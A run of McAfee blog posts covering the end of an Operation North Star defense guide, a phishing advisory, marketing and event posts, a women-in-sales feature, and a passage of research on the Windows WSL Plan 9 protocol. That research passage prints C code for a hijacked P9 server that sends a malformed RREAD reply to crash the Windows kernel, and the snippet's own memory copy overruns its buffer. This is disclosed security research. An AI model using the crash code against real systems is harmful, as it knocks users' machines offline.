Defense Evasion | Deobfuscate/Decode Files or Information (T1027) | CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR

For more information on how McAfee Endpoint Security 10.7 can prevent some of the techniques used in the Operation North Star exploit stage, review this additional blog post.

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-amsi-integration-protects-against-malicious-scripts/

Impact Stage Defensive Overview

The impact stage is where the attacker encrypts the target system and its data and perhaps moves laterally to other systems on the network. Protection at this stage is heavily dependent on adaptable anti-malware on both end user devices and servers, network controls, and security operations’ capability to monitor logs for anomalies in privileged access or network traffic. The following chart summarizes the controls expected to have the most effect against impact stage techniques and the McAfee solutions to implement those controls where possible.

MITRE Tactic | MITRE Technique | CSC Controls | McAfee Portfolio Mitigation
Discovery | Account Discovery (T1087) | CSC 4 Control Use of Admin Privileges; CSC 5 Secure Configuration; CSC 6 Log Analysis | MVISION EDR, MVISION Cloud, Cloud Workload Protection
Discovery | System Information Discovery (T1082) | CSC 4 Control Use of Admin Privileges; CSC 5 Secure Configuration; CSC 6 Log Analysis | MVISION EDR, MVISION Cloud, Cloud Workload Protection
Discovery | System Owner/User Discovery (T1033) | CSC 4 Control Use of Admin Privileges; CSC 5 Secure Configuration; CSC 6 Log Analysis | MVISION EDR, MVISION Cloud, Cloud Workload Protection
Command and Control | Encrypted Channel (T1573) | CSC 8 Malware Defenses; CSC 12 Boundary Defenses | Web Gateway, Network Security Platform

Hunting for Operation North Star Indicators

As a threat intel analyst or hunter, you might want to quickly scan your systems for any indicators you received on Operation North Star. Of course, you can do that manually by downloading a list of indicators and searching with available tools. However, if you have MVISION EDR and Insights, you can do that right from the console, saving precious time. Hunting the attacker can be a game of inches so every second counts. Of course, if you found infected systems or systems with indicators, you can take action to contain and start an investigation for incident response immediately from the MVISION EDR console.

Proactively Detecting Operation North Star Techniques

Many of the exploit stage techniques in this attack use legitimate Windows processes and applications to either exploit or avoid detection. We demonstrated above how the Endpoint Protection Platform can disrupt the weaponized documents but, by using MVISION EDR, you can get more visibility. As security analysts, we want to focus on suspicious techniques used by winword.exe as this attack leverages weaponized documents. On MVISION EDR we got the first threat detection on the monitoring dashboard for WINWORD.EXE at a Medium Risk.

The dashboard also provides a detailed look at the process activity which, in this case, is the attempt to perform the template injection.

We also received 2 alerts due to the rundll32 usage:

1) Loaded non-common file with specified parameters via rundll32 utility

2) Suspicious process would have been cleaned by Endpoint Protection (in observe mode)

Monitoring or Reporting on Operation North Star Events

Events from McAfee Endpoint Protection and Web Gateway play a key role in Lazarus incident and threat response. McAfee ePO centralizes event collection from all managed endpoint systems. As a threat responder, you may want to create a dashboard for Lazarus-related threat events to understand current exposure. Here is a list (not exhaustive) of Lazarus-related threat events as reported by McAfee Endpoint Protection Platform (Threat Prevention module), with On-Access Scan and Global Threat Intelligence enabled, and McAfee Web Gateway with Global Threat Intelligence enabled as well.

McAfee Endpoint Threat Prevention Events
Generic Trojan.dz
Generic Dropper.aou
RDN/Generic PWS.y
W97M/Downloader.cxz
Trojan-FRVP!2373982CDABA
Trojan-FRVP!AF83AD63D2E3
Generic Dropper.aou
W97M/Downloader.bjp
Trojan-FSGY!3C6009D4D7B2
W97M/MacroLess.y
Trojan-FRVP!CEE70135CBB1
Artemis!9FD35BAD075C
W97M/Downloader.cxu
RDN/Generic.dx
Trojan-FRVP!63178C414AF9
Artemis!0493F4062899
Exploit-cve2017-0199.ch
Artemis!25B37C971FD7

McAfee Web Gateway Events
Generic Trojan.dz
W97M/Downloader.cxz
RDN/Generic PWS.y
BehavesLike.Downloader.dc
Trojan-FRVP!2373982CDABA
W97M/MacroLess.y
Trojan-FSGY!3C6009D4D7B2
BehavesLike.Win32.Dropper.hc
BehavesLike.Downloader.dc
Artemis
BehavesLike.Downloader.tc

Summary

To defeat targeted threat campaigns, defenders must collaborate internally and externally to build an adaptive security architecture which will make it harder for threat actors to succeed and build resilience in the business. This blog highlights how to use McAfee’s security solutions to prevent, detect and respond to Operation North Star and attackers using similar techniques.

McAfee ATR is actively monitoring this campaign and will continue to update McAfee Insights and its social networking channels with new and current information. Want to stay ahead of the adversaries? Check out McAfee Insights for more information.

The post McAfee Defender’s Blog: Operation North Star Campaign appeared first on McAfee Blogs.

How to Keep Your Data Safe From the Latest Phishing Scam https://www.mcafee.com/blogs/consumer/consumer-threat-notices/the-latest-phishing-scam/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/the-latest-phishing-scam/#respond Wed, 29 Jul 2020 23:43:38 +0000 /blogs/?p=104121


As users, we’ll do just about anything to ensure that our devices run as efficiently as possible. This includes renewing subscriptions to online services we use daily. However, cybercriminals often take advantage of these tendencies as part of their malicious schemes. We saw this in action this week, as Tech Republic recounted two recent phishing attacks impersonating a software subscription company using a “subscription renewal” scam to trap unsuspecting users into giving up their personal and financial information.

How These Phishing Scams Work

These sneaky phishing scams all begin with an email sent to the victim’s inbox containing fraudulent links. The first one is hosted on a fake web domain, which is registered by the website builder Wix – meaning just about anyone could have created the illicit link. The scammer sends out an email telling the user that the software has an updated brand name and that they should renew their subscription to the platform by a certain due date. The email contains a link that says, “Click to Renew,” taking the victim to a submission form requesting sensitive information, including their name, address, and credit card number.

Then there’s the second but similar campaign, which also warns the recipient that their subscription has expired and needs to be renewed by a certain date. However, the link contained in this phishing email is to an actual PayPal page that prompts them to enter their payment details. This sneaky tactic is likely to trip up unsuspecting users since the real subscription service does accept PayPal. However, the payment page on a user’s real account page would not redirect them to the PayPal site, as this phishing scam does.

Protect Your Personal Data

In both schemes, the scammers attempt to harvest either the victims’ software subscription credentials or PayPal credentials by stating that the victim must renew before a specific date. Hackers tend to trick consumers by creating a sense of urgency, as tech-savvy users like you and I consider device software to be an essential part of our everyday lives. Luckily, there are steps that we can take to continue to live our lives free from worry. To avoid the digital drama that comes with phishing scams, follow these tips:

Go directly to the source

Be skeptical of emails or text messages claiming to be from organizations with peculiar asks or information that seems too good to be true. Instead of clicking on a link within the email or text, it’s best to go straight to the organization’s website or contact customer service.

Be cautious of emails asking you to act

If you receive an email or text asking you to take a certain action or download software, don’t click on anything within the message. Instead, go straight to the organization’s website. This will prevent you from downloading malicious content from phishing links.

Hover over links to see and verify the URL

If someone sends you a message with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the message altogether.

Stay updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Keep Your Data Safe From the Latest Phishing Scam appeared first on McAfee Blogs.

Six Hundred Million Reasons to Celebrate: No More Ransom Turns FOUR!! https://www.mcafee.com/blogs/other-blogs/mcafee-labs/six-hundred-million-reasons-to-celebrate-no-more-ransom-turns-four/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/six-hundred-million-reasons-to-celebrate-no-more-ransom-turns-four/#respond Mon, 27 Jul 2020 17:05:17 +0000 /blogs/?p=103182


Happy Birthday! Today we mark the fourth anniversary of the NoMoreRansom initiative with over 4.2 million visitors, from 188 countries, stopping an estimated $632 million in ransom demands from ending up in criminals’ pockets. It would be fair to say that the initiative, which started in a small meeting room in the Hague, has been integral for so many in the perpetual fight against cybercriminals.

Powered by the contributions of its 163 partners the portal, which is available in 36 languages, has added 28 tools in the past year and can now decrypt 140 different types of ransomware infection. To think, just four years ago we started with only a handful of decryptors and partners. That speaks volumes to the commitment by all members to collaborate and work together to give victims a third option; #DontPay.

All this hard work took place in an ever-changing cybercriminal landscape; during those four years ransomware criminals shifted their tactics from “spray and pay”, mostly aimed at consumers, to highly organized crime groups actively seeking to paralyze complete organizations and extort them for astronomical amounts of money.

These challenges have not discouraged NoMoreRansom and its partners; on the contrary, having a strong public private partnership between Law Enforcement and the Private sector has proven essential in several (ongoing) investigations. Without a doubt, we will be the first to admit that fighting ransomware has not been easy but that should not stop us from doing things that are hard.

We are delighted to continue supporting this initiative and play our part in fighting this global problem. However, we have to stress that the fight against ransomware is far from over, in fact we need more collaborative initiatives to combat the rise in malicious activity.  Also, there are still many individuals and organizations that do not even know about NoMoreRansom. Even within the information security industry there are those who have not heard about the availability of free decryption tools.

Please share the message: #DontPay #NoMoreRansom

The post Six Hundred Million Reasons to Celebrate: No More Ransom Turns FOUR!! appeared first on McAfee Blogs.

Introducing MITRE ATT&CK in MVISION Cloud: Defend with Precision https://www.mcafee.com/blogs/enterprise/cloud-security/introducing-mitre-attck-in-mvision-cloud-defend-with-precision/ https://www.mcafee.com/blogs/enterprise/cloud-security/introducing-mitre-attck-in-mvision-cloud-defend-with-precision/#respond Mon, 27 Jul 2020 16:50:05 +0000 /blogs/?p=103164


The latest innovation in MVISION Cloud, the multi-cloud security platform for enterprise, introduces MITRE ATT&CK into the workflow for SOC analysts to investigate cloud threats and security managers to defend against future attacks with precision.

Most enterprises use over 1,500 cloud services, generating millions of events, from login, to file share, to download and an infinite number of actions meant for productivity yet exploited by adversaries. Until now, hunting for adversary activity within that haystack has been an arduous effort, with so much noise that many data breaches have gone unnoticed until it is too late.

MVISION Cloud takes a multi-layered approach to cloud threat investigation that can speed your time to detect adversary activity in your cloud services, identify gaps, and implement targeted changes to your policy and configuration.

First, the haystack of events is processed continuously against a baseline of known good behavior by User and Entity Behavior Analytics (UEBA) to identify the anomalies and actual threats in your environment, assessing behavior across multiple services and accounts.

Events processed by UEBA determined to be a compromised account


This takes your investigation process down to a manageable quantity of incidents. With this release, those incidents are now in the same language as the rest of the SOC – MITRE ATT&CK. Each cloud security incident is mapped to ATT&CK tactics and techniques, showing you adversary activity currently being executed in your environment.  

Multi-cloud MITRE ATT&CK view of adversary activity in MVISION Cloud


You have three views within MVISION Cloud:  

  • Retrospective: viewing all adversary techniques that have already occurred in your environment 
  • Proactive: viewing attacks in progress, that you can take action to stop  
  • Full kill-chain: viewing a combination of incidents, anomalies, threats, and vulnerabilities into a holistic string of infractions.  

Multiple teams in your organization benefit from this addition to MVISION Cloud:  

  • SecOps Teams Advance from Reactive to Proactive: McAfee MVISION Cloud allows analysts to visualize not only executed threats in the ATT&CK framework, but also potential attacks they can stop across multiple Software-as-a-Service (SaaS), Platform-as-a-Service (PaaS) and Infrastructure-as-a-Service (IaaS) environments 
  • SecOps Teams Break Silos: SecOps teams can now bring pre-filtered cloud security incidents into their Security Information Event Management (SIEM)/Security Orchestration, Automation and Response (SOAR) platforms via API, mapped to the same ATT&CK framework they use for endpoint and network threat investigation  
  • Security Managers Defend with Precision: McAfee MVISION Cloud now takes Cloud Security Posture Management (CSPM) to a new level, providing security managers with cloud service configuration recommendations for SaaS, PaaS and IaaS environments, which address specific ATT&CK adversary techniques 

With McAfee, threat investigation isn’t just for one environment – it is for all of your environments, from cloud to endpoint and your analytics platforms. With McAfee MVISION Cloud, MVISION EDR and MVISION Insights, your enterprise has an extended detection and response (XDR) platform for the heterogeneous attacks you face today.

Cloud Threat Investigation 101: Hunting with MITRE ATT&CK

The leading SecOps teams use MITRE ATT&CK. Now, Cloud threat investigation speaks the same language with ATT&CK built into MVISION Cloud, unlocking new, precise methods for Cloud defense.


The post Introducing MITRE ATT&CK in MVISION Cloud: Defend with Precision appeared first on McAfee Blogs.

Virtually Impossible to Miss McAfee at Black Hat 2020 https://www.mcafee.com/blogs/enterprise/virtually-impossible-to-miss-mcafee-at-black-hat-2020/ https://www.mcafee.com/blogs/enterprise/virtually-impossible-to-miss-mcafee-at-black-hat-2020/#respond Fri, 24 Jul 2020 16:30:18 +0000 /blogs/?p=103134


Black Hat 2020 is going virtual this year, providing attendees with the latest security research, development, and trends. Every year McAfee presents our latest security research and this year promises to be innovative and informative! You can expect insightful new findings from the McAfee Advanced Threat Research team. Also join us at the virtual booth to shift your cybersecurity left with new SOC solutions and check out McAfee’s advanced device-to-cloud security solutions.

Here’s where you can see McAfee in action online August 1-6:

What should attendees expect from McAfee at Black Hat USA?

Chief Scientist and McAfee Fellow, Raj Samani spoke with Black Hat in an executive spotlight interview saying “Every year we present our latest security research and this year promises to be out of this world!! Ahem… I don’t want to give too much away but you can expect some tremendous new findings from the McAfee Advanced Threat Research team. Also, get ready for more SOC options from McAfee with a unique solution that shifts cybersecurity left, as well as even more advanced device to cloud protection.”

Read the full interview here.

Session Title: Balancing The Tug of War: How CIOs and CISOs Can Partner for Better IT

Wednesday, August 5, 10am – 10:20am PT

Speakers: McAfee CIO Scott Howitt, and CISO Arve Kjoelen

The rapid evolution of the digital world has driven great technology innovation and spawned growth in cyberthreats that range from the annoying to the catastrophic. In today’s IT environment both CIOs and CISOs are integral to the success of any organization. Historically, there has been tension between the two as they both work to balance the needs of the organization to stay on top of technology while securely implementing tools.

These roles are interdependent, since the CIO relies upon the CISO for advice, guidance and risk evaluation while the CISO depends on the CIO for support and infrastructure resources. They must work together with a holistic, integrated approach that empowers every business department within the organization with a clear vision. Information security is no longer an IT support issue, but a strategic business responsibility. Both IT executives must share common goals for security and IT operations to be successful.

In this session, McAfee CIO Scott Howitt, and CISO Arve Kjoelen will explore the tension between these key roles, how to utilize the positive and alleviate the negative effects of that tension and offer practical advice on how CIOs and CISOs can most effectively work together to ensure the needs of the organization are securely met.

Session Title: “Model Hack the Planet” – A New Frontier in Threat Research for Intelligent Systems

Session Available: Wednesday, August 5, 8:30am PT, ends Thursday, August 6, 4:30pm PT

Speaker: Steve Povolny, Head of McAfee Advanced Threat Research, McAfee

The leading edge of analytic technologies presents a new frontier to security researchers. To address this expanding attack surface, researchers are partnering with data scientists to “model hack,” exposing weaknesses in machine learning models — before attackers do. This talk covers the state of model hacking, introducing new research and progress being made to address issues.

Virtual Expo

Visit the McAfee virtual booth, watch our demo videos, and tweet for a chance to win a gift certificate. (There will be one winner per demo station, who will be randomly selected at the end of the day.)

Be sure to follow @McAfee for real-time updates from the show throughout the week.

The post Virtually Impossible to Miss McAfee at Black Hat 2020 appeared first on McAfee Blogs.

Women in Sales Part 1: Opportunities for Women Across Cybersecurity Sales https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/women-in-sales-part-1-opportunities-for-women-across-cybersecurity-sales/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/women-in-sales-part-1-opportunities-for-women-across-cybersecurity-sales/#comments Thu, 23 Jul 2020 18:47:59 +0000 /blogs/?p=103101


Collaborative, inclusive teams are what redefine cybersecurity solutions for every aspect of our connected world. At McAfee, women are making a significant impact in cybersecurity, including all aspects of sales.  

Executive vice president of global sales and marketing, Lynne Doherty, shares her perspective on the importance of inclusion and leads us into the start of our Women in Sales series: “Fostering inclusion and diversity remains a key ingredient for business success. With the vast benefits to successfully hiring and retaining a workforce shaped by different perspectives, it is predicted that 75 percent of businesses with diverse frontline decision-making teams will exceed their financial targets through 2022. [Gartner, 2019] – Thus proving that inclusion and diversity isn’t just good for company culture, it’s good for business.

“Today, businesses recognize work remains to diversify technology sales. A part of that effort includes a focus on increasing gender diversity right here at McAfee. Opportunities exist for women of varying skillsets and interests across our global sales organization — from sales operations, inside sales, field sales and channel sales to sales engineering.

“Below, meet some of the talented women in sales who have succeeded at McAfee. In this first feature, women share their perspectives on how they continue to break boundaries and achieve success in tech sales.”

Meet McAfee’s Women in Sales

“As women, we have been gaining much more space in the professional world, and companies like McAfee are where we are increasingly more relevant. The sector is evolving, and the market and opportunities are growing. As long as women continue to prepare themselves, starting from time spent in school, and understand that this is a good opportunity to develop, we will improve the statistics. McAfee is a company that promotes (women in management) and it shows, even in the selection processes. I really appreciate this at McAfee.”

— Andrea, Enterprise Sales, Bogotá, Colombia

“Many women think you have to be technical to be in tech sales and that isn’t true. I came to McAfee understanding sales and relationship management. Since being here, I’ve focused on upping my security and technology knowledge. I’ve found not being too technical allows me to listen more to the customer and focus on the desired business outcome. Often, the engineers can get deep into the technology, but I think it’s important to be the intermediary; I stay in the ‘forest’ not the trees.”

—Ashley, Consumer Sales, Richmond, Virginia

“We need to ensure women have the confidence to apply for the roles within IT. I encourage women to move outside your comfort zone and shrug off stigmas. We are more than entitled to sit at this table.”

—Eadaoin, Inside Sales, Cork, Ireland

“In the corporate world, women face challenges from many different angles. Often, I may be the only woman in a room or on my teams, but my advice would be to remain confident and not to second guess your position or authority. While I may be the only woman many times, I also am often the only woman of color, which makes it even more important we continue to advocate for representation. Diversity comes in all forms and quite frankly is necessary because it brings a unique value to a team. At the start of my career, I learned the importance of demonstrating my skills and that I shouldn’t shy away, hold back or “wait for my turn” which has been advantageous when an opportunity presents itself.”

—Jardin, Inside Sales, Plano, Texas

“Sales has changed considerably in the 20 years I’ve worked in tech. In an early role, I was told a man would never buy from a woman. I was inspired to prove that wrong. These days the environment is entirely different. McAfee, like many companies, has zero tolerance for such conduct or mindset. The culture is positive, inclusive and one where anyone can succeed. Each of us has a responsibility to show future generations that cybersecurity is a great career option for all.”

—Katie, Enterprise Sales, Cheltenham, England

“I see the two primary challenges for women in tech sales as perception and awareness. There is a traditional view that you must be technical to work in technology. I‘m not naturally technical, and I always assumed you had to have a technical background like coding or programming. And that is not the case, so you can learn technology if you have all the other skills that make a great salesperson.”

—Krista, Enterprise Sales, Detroit, Michigan

“In terms of numbers, while we’re making progress, I’d love for us to see more women in tech, especially in sales. This is why mentoring, sponsorship and support for women in sales is so important – whether as the customer or the vendor. When you and your customer have things in common like gender, culture and experience it helps to strengthen the relationship and sales process.”

—Kristol, Inside Sales, Plano, Texas

“In my previous experiences, I’ve been one of the only women at the table. I would tell women not to get discouraged by this; it is about finding the right company for you. Find what makes you happy to get up every day to be part of it.”

—Paige, Sales Operations, Plano, Texas

“Historically, I was the only woman in the room, but things have definitely changed! Women may too quickly dismiss technology as a career, but in sales, it’s all about finding a solution for your customer, and women have amazing skillsets to do that.”

—Brenda, Consumer Sales, Vancouver, British Columbia

Learn more about how McAfee women in our sales organization leverage their skillsets for a successful career in our upcoming blog.

Interested in joining a company that supports inclusion and belonging? Search our jobs. Subscribe to Job Alerts.

The post Women in Sales Part 1: Opportunities for Women Across Cybersecurity Sales appeared first on McAfee Blogs.

Hunting for Blues – the WSL Plan 9 Protocol BSOD https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hunting-for-blues-the-wsl-plan-9-protocol-bsod/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hunting-for-blues-the-wsl-plan-9-protocol-bsod/#respond Thu, 23 Jul 2020 14:53:58 +0000 /blogs/?p=102882


Windows Subsystem for Linux Plan 9 Protocol Research Overview

This is the final blog in the McAfee research series trilogy on the Windows Subsystem for Linux (WSL) implementation – see The Twin Journey (part 1) and Knock, Knock–Who’s There (part 2). The previous research discussed file evasion attacks when the Microsoft P9 server can be hijacked with a malicious P9 (Plan 9 File System Protocol) server. Since Windows 10 version 1903, it is possible to access Linux files from Windows by using the P9 protocol. The Windows 10 operating system comes with the P9 server as part of the WSL install so that it can communicate with a Linux filesystem. In this research we explore the P9 protocol implementation within the Windows kernel and whether we could execute code in it from a malicious P9 server. We created a malicious P9 server by hijacking the Microsoft P9 server and replacing it with code we can control.

In a typical attack scenario, we discovered that if WSL is enabled on Windows 10, then a non-privileged local attacker can hijack the WSL P9 communication channel to cause a local Denial of Service (DoS) or Blue Screen of Death (BSOD) in the Windows kernel. It is not possible to achieve escalation of privilege (EoP) within the Windows kernel due to this vulnerability; the BSOD appears to be as designed by Microsoft within their legitimate fail flow, if malformed P9 server communication packets are received by the Windows kernel. A non-privileged user should not be able to BSOD the Windows kernel, from a local or remote perspective. If WSL is not enabled (disabled by default on Windows 10), the attack can still be executed but requires the attacker to be a privileged user to enable WSL as a pre-requisite.

There have recently been some critical, wormable protocol vulnerabilities within the RDP and SMB protocols in the form of Bluekeep and SMBGhost. Remotely exploitable vulnerabilities are very high risk if they are wormable as they can spread across systems without any user interaction. Local vulnerabilities are lower risk since an attacker must first have a presence on the system; in this case they must have a malicious P9 server executing. The P9 protocol implementation runs locally within the Windows kernel so the objective, as with most local vulnerability hunting, is to find a vulnerability that allows an escalation of privilege (EoP).

In this blog we do a deep dive into the protocol implementation and vulnerability hunting process. There is no risk to WSL users from this research, which has been shared with and validated by Microsoft. We hope this research will help improve understanding of the WSL P9 communications stack and that additional research would be more fruitful further up the stack.

There have been some exploits on WSL such as here and here but there appears to be no documented research of the P9 protocol implementation other than this.

P9 Protocol Overview

The Plan 9 File System Protocol server allows a client to navigate its file system to create, remove, read and write files. The client sends requests (T-messages) to the server and the server responds with R-messages. The P9 protocol has a header consisting of size, type and tag fields which is followed by a message type field depending on the request from the client. The R-message type sent by the server must match the T-message type initiated from the client. The maximum connection size for the data transfer is decided by the client during connection setup; in our analysis below, it is 0x10000 bytes.

P9 protocol header followed by message type union (we have only included the subset of P9 message types which are of interest for vulnerability research):

typedef struct P9Packet {
    u32 size;   /* total packet size, including this header */
    u8  type;   /* message type, see enum p9_msg_t below */
    u16 tag;    /* echoes the tag of the client's T-message */
    union {
        struct p9_rversion rversion;
        struct p9_rread    rread;
        struct p9_rreaddir rreaddir;
        struct p9_rwalk    rwalk;
    } u;
} P9Packet;

The P9 T-message and corresponding R-message numbers for the types we are interested in (the R-message is always T-message+1):

enum p9_msg_t {
    P9_TREADDIR = 40,
    P9_RREADDIR = 41,
    P9_TVERSION = 100,
    P9_RVERSION = 101,
    P9_TWALK    = 110,
    P9_RWALK    = 111,
    P9_TREAD    = 116,
    P9_RREAD    = 117,
};

At the message type layer, which follows the P9 protocol header, the structures below carry the variable-size fields (the qid array, the read data buffers and the version string), whose lengths are supplied by the server:

struct p9_rwalk {
    u16 nwqid;                          /* number of qids that follow */
    struct p9_qid wqids[P9_MAXWELEM];
};

struct p9_rread {
    u32 count;                          /* number of data bytes that follow */
    u8 *data;
};

struct p9_rreaddir {
    u32 count;                          /* number of data bytes that follow */
    u8 *data;
};

struct p9_rversion {
    u32 msize;                          /* maximum message size for the connection */
    struct p9_str version;
};

struct p9_str {
    u16 len;                            /* string length; the string is not NUL-terminated */
    char *str;
};

Based on the packet structure of the P9 protocol we need to hunt for message type confusion and memory corruption vulnerabilities such as out of bounds read/write.

So, what will a packet structure look like in memory? Figure 1 shows the protocol header and message type memory layout from WinDbg. The message size (msize) is negotiated to 0x10000 and the version string is “9P2000.W”.

Figure 1. P9 packet for rversion message type

Windows WSL P9 Communication Stack and Data Structures

Figure 2. Windows Plan 9 File System Protocol Implementation within WSL

The p9rdr.sys network mini-redirector driver registers the “\\Device\\P9Rdr” device with the Redirected Drive Buffering Subsystem (RDBSS) using the RxRegisterMinirdr API as part of the p9rdr DriverEntry routine. During this registration, the following P9 APIs or driver routines are exposed to the RDBSS:

  • P9NotImplemented
  • P9Start
  • P9Stop
  • P9DevFcbXXXControlFile
  • P9CreateSrvCall
  • P9CreateVNetRoot
  • P9ExtractNetRootName
  • P9FinalizeSrvCall
  • P9FinalizeVNetRoot
  • P9Create
  • P9CheckForCollapsibleOpen
  • P9CleanupFobx
  • P9CloseSrvOpen
  • P9ForceClosed
  • P9ExtendFile
  • P9Flush
  • P9QueryDirectoryInfo
  • P9QueryVolumeInfo
  • P9QueryFileInfo
  • P9SetFileInfo
  • P9IsValidDirectory
  • P9Read
  • P9Write

The p9rdr driver is not directly accessible from user mode using the DeviceIoControl API and all calls must go through the RDBSS.

As seen in Figure 2, when a user navigates to the WSL share at “\\wsl$” from Explorer, the RDBSS driver calls into the P9 driver through the previously registered APIs.

DIOD is a file server implementation that we modified to be a “malicious” P9 server, where we claim the “fsserver” socket name before the Windows OS does, in a form of squatting attack. Once we had replaced the Microsoft P9 server with the DIOD server, we modified the “np_req_respond” function (explained in the fuzzing constraints section) so that we could control P9 packets and send malicious responses to the Windows kernel. Our malicious P9 server and socket hijacking have been explained in detail here.

So now we know how data travels from Explorer to the P9 driver but how does the P9 driver communicate with the malicious P9 server? They communicate over AF_UNIX sockets.

There are two important data structures used for controlling data flow within the P9 driver called P9Client and P9Exchange.

The P9Client and P9Exchange data structures, when reverse engineered to the fields relevant to this research, look like the following (fields not relevant to this analysis have been labelled as UINT64 for alignment):

typedef struct P9Client {
PVOID * WskTransport_vftable
PVOID * GlobalDevice
UINT64 RunRef
WskSocket *WskData
UINT64
UINT64
UINT_PTR
PVOID *MidExchangeMgr_vftable
PRDBSS_DEVICE_OBJECT *RDBSS
UINT64
PVOID **WskTransport_vftable
PVOID **MidExchangeMgr_vftable
P9Packet *P9PacketStart
UINT64 MaxConnectionSize
UINT64 Rmessage_size
P9Packet *P9PacketEnd
UINT_PTR
UINT64
UINT64
UINT_PTR
UINT64
UINT64
PVOID * Session_ReconnectCallback
PVOID ** WskTransport_vftable
UINT64
UINT_PTR
UINT_PTR
UINT64
UINT_PTR
UINT64
UINT64
UINT64
} P9Client;

P9Client data structure memory layout in WinDbg:

typedef struct P9Exchange {
UINT64
UINT64
P9Client *P9Client
UINT64 Tmessage_type
UINT64
UINT_PTR
PVOID *Lambda_PTR1
PVOID *Lambda_PTR2
PRX_CONTEXT *RxContext
UINT64 Tmessage_size
UINT64
UINT64
UINT64
UINT64
UINT64
UINT64
} P9Exchange;

The P9Exchange data structure layout in WinDbg:

To communicate with the P9 server, the P9 driver creates an I/O request packet (IRP) to receive data from the Winsock Kernel (WSK). An important point to note is that the Memory Descriptor List (MDL) used to hold the data passed between the P9 server and Windows kernel P9 client is 0x10000 bytes (the max connection size mentioned earlier).

virtual long WskTransport::Receive(){
    UINT64 MaxConnectionSize = 0x10000;
    P9_IRP_OBJECT = RxCeAllocateIrpWithMDL(2, 0, 0i64);
    P9_MDL = IoAllocateMdl(P9Client->P9PacketStart, MaxConnectionSize, 0, 0, 0i64);
    MmBuildMdlForNonPagedPool(P9_MDL);
    P9_IRP_OBJECT->IoStackLocation->Parameters->MDL = &P9_MDL;
    P9_IRP_OBJECT->IoStackLocation->Parameters->P9Client = &P9Client;
    P9_IRP_OBJECT->IoStackLocation->Parameters->DataPath = &P9Client::ReceiveCallback;
    P9_IRP_OBJECT->IoStackLocation->CompletionRoutine = p9fs::WskTransport::SendReceiveComplete;
    WskProAPIReceive(*WskSocket, *P9_MDL, 0, *P9_IRP_OBJECT);
}

The MDL is mapped to the P9PacketStart field address within the P9Client data structure.

On IRP completion, the WskTransport::SendReceiveComplete completion routine is called to retrieve the P9Client structure from the IRP to process the P9 packet response from the server:

int static WskTransport::SendReceiveComplete(IRP *P9_IRP_OBJECT){
    P9Client = &P9_IRP_OBJECT->IoStackLocation->Parameters->P9Client;
    P9Client::ReceiveCallback(P9Client);
}

The P9Client data structure is used within an IRP to receive the R-message data but what is the purpose of the P9Exchange data structure?

  1. When the P9 driver sends a T-message to the server, it must create an exchange so that it can track the state between the message type sent (T-message) and that returned by the server (R-Message).
  2. It contains lambda functions to execute on the specific message type. The Tmessage_type field within the P9Exchange data structure ensures that the server can only send R-messages to the same T-message type it received from the P9 driver.
  3. PRX_CONTEXT * RxContext structure is used to transfer data between Explorer and the p9rdr driver via the RDBSS driver.

The flow of a WALK T-message can be seen below:

Within the P9Client::CreateExchange function, the MidExchangeManager::RegisterExchange is responsible for registering the P9Exchange data structure with the RDBSS using a multiplex ID (MID) to distinguish between concurrent server and client requests.

MidExchangeManager::RegisterExchange(*P9Client, *P9Exchange){
    NTSTATUS RxAssociateContextWithMid(PRX_MID_ATLAS P9Client->RDBSS, PVOID P9Exchange, PUSHORT NewMid);
}

The important fields within the P9Client and P9Exchange data structures which we will discuss further during the analysis:

  1. P9Client->MaxConnectionSize – set at the start of the connection and cannot be controlled by an attacker
  2. P9Client->P9PacketStart – points to the P9 packet received and can be fully controlled by an attacker
  3. P9Client->Rmessage_size – can be fully controlled by an attacker
  4. P9Exchange->Tmessage_type – set during T-message creation and cannot be controlled by an attacker
  5. P9Exchange->RxContext – used to pass data from the P9 driver through the RDBSS to Explorer

Now that we know how the protocol works within the Windows kernel, the next stage is vulnerability hunting.

Windows Kernel P9 Server Vulnerability Hunting

P9 Packet Processing Logic

From a vulnerability perspective we want to audit the Windows kernel logic within p9rdr.sys, responsible for parsing traffic from the malicious P9 server. Figure 3 shows the source of the P9 packet and the sink, or where the packet processing completes within the p9rdr driver.

Figure 3. Windows Kernel Processing layers for the P9 protocol malicious server response parsing

Now that we have identified the code for parsing the P9 protocol message types of interest we need to audit the code for message type confusion and memory corruption vulnerabilities such as out of bounds read/write and overflows.

Fuzzing constraints

There were a number of constraints which made deploying automated fuzzing logic difficult:

  1. The R-message type sent from the malicious P9 server must match the T-message type sent by the Windows kernel
  2. Timeouts in higher layers of the WSL stack

The above challenges could have been overcome, but since the protocol is relatively simple we decided to focus on reversing the processing logic validation. To verify the processing logic validation, we created some manual fuzzing capability within the malicious P9 server to test the variable length packet field boundaries identified from the protocol overview.

Below is an example RREAD R-message which sends a malicious P9 packet in response to a TREAD T-message, where we control the count and data variable length fields.

srv.c

void
np_req_respond(Npreq *req, Npfcall *rc)
{
    NP_ASSERT (rc != NULL);
    xpthread_mutex_lock(&req->lock);

    /* attacker-controlled count and data fields for the RREAD reply */
    u32 count = 0xFFFFFFFF;
    Npfcall *fake_rc;
    u8 *data = malloc(0xFFF0);
    memset(data, 'A', 0xFFF0);

    if (!(fake_rc = np_alloc_rread1(count))) {
        xpthread_mutex_unlock(&req->lock);
        return;
    }
    if (fake_rc->u.rread.data)
        memmove(fake_rc->u.rread.data, data, count);

    if (rc->type == 0x75) {          /* 0x75 == P9_RREAD */
        fprintf (stderr, "RREAD Packet Reply");
        req->rcall = fake_rc;
    }
    else {
        req->rcall = rc;
    }
    if (req->state == REQ_NORMAL) {
        np_set_tag(req->rcall, req->tag);
        np_conn_respond(req);
    }
    xpthread_mutex_unlock(&req->lock);
}

Validation Checks

